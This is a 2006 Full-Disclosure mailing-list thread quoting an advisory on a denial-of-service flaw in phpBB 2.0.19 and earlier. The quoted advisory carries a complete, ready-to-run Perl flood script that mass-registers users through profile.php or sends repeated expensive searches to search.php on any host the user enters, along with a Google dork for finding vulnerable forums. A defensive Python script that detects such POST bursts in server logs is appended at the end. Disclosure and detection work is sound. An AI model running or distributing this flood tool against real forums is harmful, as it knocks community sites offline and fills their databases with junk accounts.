Date: Thu Jan 26 11:31:35 2006
From: skodliv at gmail.com (poo)
Subject: HYSA-2006-001 phpBB 2.0.19 search.php and profile.php DOS Vulnerability

So what you're saying is that DoS exploits shouldn't be disclosed?

On 1/25/06, Edward Pearson <Ed@...tyitservices.co.uk> wrote:
>
> The less said about DoS attacks the better. A tactic mostly employed by
> asexual teenagers who live in their parents' basement and call themselves
> "h4x0rz".
>
>  ------------------------------
>  *From:* full-disclosure-bounces@...ts.grok.org.uk [mailto:
> full-disclosure-bounces@...ts.grok.org.uk] *On Behalf Of *h4cky0u
> *Sent:* 25 January 2006 14:44
> *To:* full-disclosure@...ts.grok.org.uk
> *Cc:* bugtraq@...urityfocus.com
> *Subject:* [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php
> and profile.php DOS Vulnerability
>
>
>
> ------------------------------------------------------
>       HYSA-2006-001 h4cky0u.org Advisory 010
> ------------------------------------------------------
> Date - Wed Jan 25 2006
>
>
> TITLE:
> ======
>
> phpBB 2.0.19 search.php and profile.php DOS Vulnerability
>
>
> SEVERITY:
> =========
>
> High
>
>
> SOFTWARE:
> =========
>
> phpBB 2.0.19 and prior
>
>
> INFO:
> =====
>
> phpBB is a high powered, fully scalable, and highly customizable
> Open Source bulletin board package. phpBB has a user-friendly
> interface, simple and straightforward administration panel, and
> helpful FAQ. Based on the powerful PHP server language and your
> choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
> phpBB is the ideal free community solution for all web sites.
>
> Support Website : http://www.phpbb.com
>
>
> BUG DESCRIPTION:
> ================
>
> The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at:
>
> http://h4cky0u.org/viewtopic.php?t=637
>
> This one affected only versions up to phpBB 2.0.15. The exploit code has been recoded so that it affects the latest version too. The bug resides in the following two scripts:
>
> profile.php << By registering as many users as you can.
> search.php  << By searching in a way that the db cannot understand.
>
>
> Proof Of Concept Code:
> ======================
>
> #!/usr/bin/perl
> #######################################
> ##   Recoded by: mix2mix and Elioni of http://ahg-khf.org
> ##   And h4cky0u Security Forums (http://h4cky0u.org)
> ##   Name: phpBBDoSReloaded
> ##   Original Author: HaCkZaTaN of Neo Security Team
> ##   Tested on phpBB 2.0.19 and earlier versions
> ##   Ported to perl by g30rg3_x
> ##   Date: 25/01/06
> #######################################
> use IO::Socket;
>
> ## Initialize the loop counter X
> $x = 0;
>
> print q(
>   phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
>   Recoded by Albanian Hackers Group &
>   h4cky0u Security Forums	
>
> );
> print q(Host |without-> http://www.| );
> $host = <STDIN>;
> chop ($host);
>
> print q(Path |example-> /phpBB2/ or /| );
> $pth = <STDIN>;
> chop ($pth);
>
> print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
> $type = <STDIN>;
> chop ($type);
>
> ## Type 1: registration flood
> if($type == 1){
>
> ## User Loop for 9999 loops (enough for Flood xDDDD)
> while($x != 9999)
> {
>
> ## Username that gets registered automatically for iteration X
> $uname = "username=AHG__" . "$x";
>
> ## Email address that gets registered in the database for iteration X
> $umail = "&email=AHG__" . "$x";
>
> $postit = "$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
>
> $lrg = length $postit;
>
> my $sock = new IO::Socket::INET (
>                                  PeerAddr => "$host",
>                                  PeerPort => "80",
>
>                                  Proto => "tcp",
>                                 );
> die "\nNuk mundem te lidhemi me hostin sepse ?sht dosirat ose nuk egziston: $!\n" unless $sock;
>
> ## Send the HTTP request that registers a user in the phpBB forum through the socket
> print $sock "POST $pth"."profile.php HTTP/1.1\n";
> print $sock "Host: $host\n";
> print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
> print $sock "Referer: $host\n";
> print $sock "Accept-Language: en-us\n";
> print $sock "Content-Type: application/x-www-form-urlencoded\n";
> print $sock "Accept-Encoding: gzip, deflate\n";
> print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
> print $sock "Connection: Keep-Alive\n";
> print $sock "Cache-Control: no-cache\n";
> print $sock "Content-Length: $lrg\n\n";
> print $sock "$postit\n";
> close($sock);
>
> ## Print a "+" for every loop
> syswrite STDOUT, "+";
>
> $x++;
> }
>
>
> ## Type 2: search flood
> }
> elsif ($type == 2){
>
> while($x != 9999)
> {
> ## Final Search String to Send
> $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
>
> ## POST body length
> $lrg = length $postit;
>
> ## Connect Socket with Variables Provided By User
> my $sock = new IO::Socket::INET (
>                                  PeerAddr => "$host",
>
>                                  PeerPort => "80",
>                                  Proto => "tcp",
>                                 );
> die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
>
> ## Send the HTTP request for a search the DB cannot handle through the socket
> print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
> print $sock "Host: $host\n";
>
> print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
> print $sock "Referer: $host\n";
> print $sock "Accept-Language: en-us\n";
> print $sock "Content-Type: application/x-www-form-urlencoded\n";
> print $sock "Accept-Encoding: gzip, deflate\n";
> print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
> print $sock "Connection: Keep-Alive\n";
> print $sock "Cache-Control: no-cache\n";
> print $sock "Content-Length: $lrg\n\n";
> print $sock "$postit\n";
> close($sock);
>
> ## Print a "+" for every loop
> syswrite STDOUT, "+";
>
> ## Increment X in One for every Loop
> $x++;
> }
> }else{
> ## Anything else: unrecognised option
>    die "Mund?sia nuk Lejohet +_-???\n";
> }
>
>
> FIX:
> ====
>
> No fix available as of date.
>
>
> GOOGLEDORK:
> ===========
>
> "Powered by phpBB"
>
>
> CREDITS:
> ========
>
> - This vulnerability was discovered and researched by HaCkZaTaN of NeoSecurityteam.
>
>
> - Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest release of the script -
>
> Web : http://ahg-khf.org
>
> mail : webmaster at ahg-khf dot org
>
>
> - Co Researcher -
>
> h4cky0u of h4cky0u Security Forums.
>
> mail : h4cky0u at gmail dot com
>
> web : http://www.h4cky0u.org
>
>
> ORIGINAL ADVISORY:
> ==================
>
> http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt
>
> --
> http://www.h4cky0u.org
> (In)Security at its best...
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


--
smile tomorrow will be worse
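Detection logic for the two flood patterns the advisory describes (bursts of POSTs to profile.php for registration and to search.php for searches), added here as my own example and not code from the advisory, the thread or phpBB. It runs over constructed Apache combined-format log lines; the /phpBB2/ path, the per-minute threshold and the IPs are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# Endpoints abused by the PoC: the registration form and the search results page.
WATCHED = {"profile.php": "registration flood", "search.php": "search flood"}

def parse_line(line):
    """Return (ip, minute_bucket, script) for a watched POST, else None."""
    m = LOG_RE.match(line)
    if not m or m.group("method") != "POST":
        return None
    script = m.group("path").split("?", 1)[0].rsplit("/", 1)[-1]
    if script not in WATCHED:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts.replace(second=0), script

def flood_alerts(lines, threshold=20):
    """Count watched POSTs per (ip, minute, script); report buckets at or over threshold."""
    counts = defaultdict(int)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            counts[parsed] += 1
    return sorted(
        (ip, minute.strftime("%H:%M"), WATCHED[script], n)
        for (ip, minute, script), n in counts.items() if n >= threshold
    )

# Constructed sample (assumed addresses): 25 registration POSTs and 3 search POSTs
# from one IP within a minute, plus one legitimate registration from another IP.
SAMPLE_LOG = (
    [f'198.51.100.7 - - [25/Jan/2006:14:44:{i:02d} +0000] "POST /phpBB2/profile.php HTTP/1.1" 200 4123'
     for i in range(25)]
    + [f'198.51.100.7 - - [25/Jan/2006:14:44:{30 + i:02d} +0000] "POST /phpBB2/search.php?mode=results HTTP/1.1" 200 9876'
       for i in range(3)]
    + ['203.0.113.9 - - [25/Jan/2006:14:44:59 +0000] "POST /phpBB2/profile.php HTTP/1.1" 200 4123',
       '203.0.113.9 - - [25/Jan/2006:14:45:01 +0000] "GET /phpBB2/index.php HTTP/1.1" 200 15210']
)

if __name__ == "__main__":
    for ip, minute, kind, n in flood_alerts(SAMPLE_LOG):
        print(f"{ip} {minute} {kind}: {n} POSTs in one minute")
```

With the default threshold only the registration burst is reported; lowering it to 3 also surfaces the search burst while the single legitimate registration stays below it.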
